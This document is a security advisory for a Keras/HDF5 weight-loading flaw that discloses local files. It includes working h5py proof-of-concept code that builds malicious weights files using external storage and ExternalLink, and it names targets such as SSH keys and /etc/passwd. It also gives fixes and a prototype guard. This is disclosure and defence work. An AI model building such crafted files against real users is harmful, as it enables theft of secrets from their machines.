Description
Keras: Local File Disclosure via HDF5 External Storage During Weight Loading
Summary
TensorFlow / Keras continues to honor HDF5 “external storage” and `ExternalLink` features when loading weights. A malicious `.weights.h5` file (or a `.keras` archive embedding such weights) can direct `load_weights()` to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).
Impact
- Class: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)
- What leaks: contents of any file readable by the process (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).
- Visibility: secrets appear in model outputs (e.g., a Dense layer bias) or get embedded into newly saved artifacts.
- Prerequisites: the victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.
- Scope: applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.
Attacker Scenario
- Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact, for example by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
- Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home/<user>/.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).
- Execution: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.
- Exfiltration vectors:
  - Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
  - Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.
  - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.
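The zero-input vector works because a dense layer computes y = xW + b, so feeding x = 0 returns exactly the bias vector. A minimal NumPy sketch of the principle (standing in for real Keras inference; the secret bytes here are illustrative):

```python
import numpy as np

# Secret bytes an attacker injected into the bias of a Dense layer.
secret = b"hunter2"
bias = np.frombuffer(secret, dtype=np.uint8).astype(np.float32)

# Dense layer forward pass: y = x @ W + b. The kernel is irrelevant here.
weights = np.random.default_rng(0).normal(size=(4, bias.size)).astype(np.float32)
x = np.zeros((1, 4), dtype=np.float32)   # attacker-controlled zero input
y = x @ weights + bias                   # "inference" output

# The output equals the injected bias, i.e. the secret bytes verbatim.
recovered = y.astype(np.uint8).tobytes()
print(recovered)  # b'hunter2'
```

Byte values 0-255 are represented exactly in float32, so the round-trip through the model is lossless.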
Additional Preconditions
- The target file must exist and be readable by the process running TensorFlow/Keras.
- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.
- Environments with strict filesystem permissioning or sandboxing (e.g., a container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.
Environment Used for Verification (2025‑10‑19)
- OS: Debian-based container running Python 3.11.
- Packages (installed via `python -m pip install -U ...`): `tensorflow==2.20.0`, `keras==3.11.3`, `h5py==3.15.1`, `numpy==2.3.4`.
- Tooling: `strace` (for syscall tracing); `pip` upgraded to latest before installs.
- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to capture verbose logs if needed.
Reproduction Instructions (Weights-Only PoC)
- Ensure the environment above (or equivalent) is prepared.
- Save the following script as `weights_external_demo.py`:
- Execute `python weights_external_demo.py`.
- Observe:
  - `secret_text_source` prints the chosen host file path.
  - `recovered_ascii` / `recovered_hex64` display the file contents recovered via model inference.
  - A re-saved weights file contains the leaked bytes inside the artifact.
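The full PoC script is not reproduced in this write-up, but the core trick it relies on can be sketched with `h5py` alone. The following is a simplified illustration (temp-file paths stand in for real host files; it is not the exact PoC):

```python
import os
import tempfile

import h5py
import numpy as np

# Illustrative stand-in for a sensitive host file (e.g. /etc/hostname).
workdir = tempfile.mkdtemp()
secret_path = os.path.join(workdir, "secret.txt")
with open(secret_path, "wb") as fh:
    fh.write(b"TOP-SECRET-HOSTNAME\n")
size = os.path.getsize(secret_path)

# Craft a weights-like HDF5 file whose dataset bytes are NOT stored in the
# file itself: HDF5 "external storage" points the dataset at secret_path.
evil_path = os.path.join(workdir, "evil.weights.h5")
with h5py.File(evil_path, "w") as f:
    f.create_dataset("bias", shape=(size,), dtype=np.uint8,
                     external=[(secret_path, 0, size)])

# Any consumer that reads this dataset (h5py here, Keras weight loading in
# the real attack) receives the target file's bytes.
with h5py.File(evil_path, "r") as f:
    leaked = bytes(f["bias"][...])
print(leaked)
```

Note that `evil.weights.h5` itself never contains the secret; the bytes are pulled from the victim's filesystem at load time.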
Expanded Validation (Multiple Attack Scenarios)
The following test harness generalises the attack for multiple HDF5 constructs:
- Build a minimal feed-forward model and baseline weights.
- Create three malicious variants:
  - External storage dataset: a dataset references `/etc/hosts`.
  - External link: an `ExternalLink` pointing at `/etc/passwd`.
  - Indirect link: external storage referencing a helper HDF5 file that, in turn, refers to `/etc/hostname`.
- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.
- Post-process traces and weight tensors to show the exact bytes loaded.
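For reference, the external-link variant takes only a couple of `h5py` calls to construct. A hedged sketch with illustrative file names (the real harness points the link at `/etc/passwd`):

```python
import os
import tempfile

import h5py
import numpy as np

workdir = tempfile.mkdtemp()

# Helper file standing in for a sensitive target.
target_path = os.path.join(workdir, "target.h5")
with h5py.File(target_path, "w") as f:
    f.create_dataset("payload", data=np.arange(4, dtype=np.uint8))

# Malicious weights file: "kernel" is an HDF5 ExternalLink, so dereferencing
# it transparently opens target.h5 and reads the linked dataset.
evil_path = os.path.join(workdir, "evil.h5")
with h5py.File(evil_path, "w") as f:
    f["kernel"] = h5py.ExternalLink(target_path, "/payload")

with h5py.File(evil_path, "r") as f:
    linked = f["kernel"][...]   # resolved through the external link
print(linked.tolist())  # [0, 1, 2, 3]
```

The indirect variant chains the two mechanisms: external storage in the main file pointing at a helper HDF5 whose own dataset references the final target.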
Relevant syscall excerpts captured during the run (not reproduced here) showed each targeted file being opened and read.
The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.
Recommended Product Fix
- Default-deny external datasets/links:
  - Inspect dataset creation property lists (`get_external_count`) before materialising tensors.
  - Resolve `SoftLink` / `ExternalLink` targets and block any that leave the HDF5 file.
- Provide an escape hatch:
  - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.
- Documentation:
  - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
- Regression coverage:
  - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.
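A default-deny check along these lines can be prototyped with `h5py` alone. The sketch below is illustrative (the helper name is invented for this example, and it is not the `safe_keras_hdf5.py` prototype); it rejects a file before any external bytes are materialised:

```python
import h5py


def assert_no_external_refs(path):
    """Refuse to proceed if an HDF5 file uses external links or storage.

    Sketch of a default-deny guard: raises ValueError before any external
    bytes are read. A production version would also handle virtual
    datasets and dangling soft links.
    """
    def walk(group, prefix=""):
        for name in group:
            full = f"{prefix}/{name}"
            # Inspect the link itself first, without resolving it.
            link = group.get(name, getlink=True)
            if isinstance(link, h5py.ExternalLink):
                raise ValueError(f"external link {full!r} -> {link.filename}")
            obj = group[name]
            if isinstance(obj, h5py.Dataset):
                # External storage is recorded on the dataset creation
                # property list, not in the data itself.
                if obj.id.get_create_plist().get_external_count() > 0:
                    raise ValueError(f"external storage on dataset {full!r}")
            elif isinstance(obj, h5py.Group):
                walk(obj, full)

    with h5py.File(path, "r") as f:
        walk(f)
```

A loader wrapper could run this check before handing the path to `model.load_weights(...)`, failing closed on any external reference.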
Workarounds
- Avoid loading untrusted HDF5 weight files.
- Pre-scan weight files with `h5py` to detect external datasets or links before invoking Keras loaders.
- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.
- If loading untrusted files is unavoidable, run the load inside a sandboxed environment with limited filesystem access.
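To illustrate the `.npz` alternative (array names here are arbitrary): the format is a flat zip of `.npy` members, so a member cannot point a read outside the archive the way HDF5 external storage or `ExternalLink` can.

```python
import os
import tempfile

import numpy as np

# Plain-array weight exchange: every byte lives inside the archive itself.
weights = {
    "kernel": np.ones((4, 2), dtype=np.float32),
    "bias": np.zeros(2, dtype=np.float32),
}
path = os.path.join(tempfile.mkdtemp(), "weights.npz")
np.savez(path, **weights)

with np.load(path) as loaded:   # allow_pickle=False by default
    restored = {name: loaded[name] for name in loaded.files}
```

`np.load` refuses pickled objects by default, which also closes off the unrelated pickle code-execution vector.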
Timeline (UTC)
- 2025‑10‑18: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.
- 2025‑10‑19: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented a `safe_keras_hdf5.py` prototype guard.
References
- https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q
- https://nvd.nist.gov/vuln/detail/CVE-2026-1669
- https://github.com/keras-team/keras/pull/22057
- https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553
- https://github.com/keras-team/keras/releases/tag/v3.12.1
- https://github.com/keras-team/keras/releases/tag/v3.13.2
Packages

| Package | Affected versions | Patched version |
| --- | --- | --- |
| keras | >= 3.13.0, < 3.13.2 | 3.13.2 |
| keras | >= 3.0.0, < 3.12.1 | 3.12.1 |
Related Vulnerabilities
Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.